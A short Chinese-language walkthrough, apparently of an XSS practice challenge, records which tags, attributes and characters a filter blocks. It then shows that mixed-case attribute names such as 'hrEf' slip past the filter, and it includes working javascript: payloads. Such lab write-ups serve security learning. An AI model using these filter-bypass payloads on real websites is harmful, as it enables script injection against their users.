经过判断,发现没过滤 < > " 但是有些关键词和 ' 不能用了,大致判断和第五题一样,换一个标签
"> <a href=javascript:alert('xss') > xss</a> //
也不行了,过滤了href
onfocus,onblur,onkeydown,action也被过滤了 (on被过滤了)
src也被过滤了
"><table background=javascript:alert(1)></table> //
这个没被过滤,但是好像也没什么用
尝试很多次之后,发现可以用大小写绕过
"> <a hrEf=javascript:alert('xss') > xss</a> //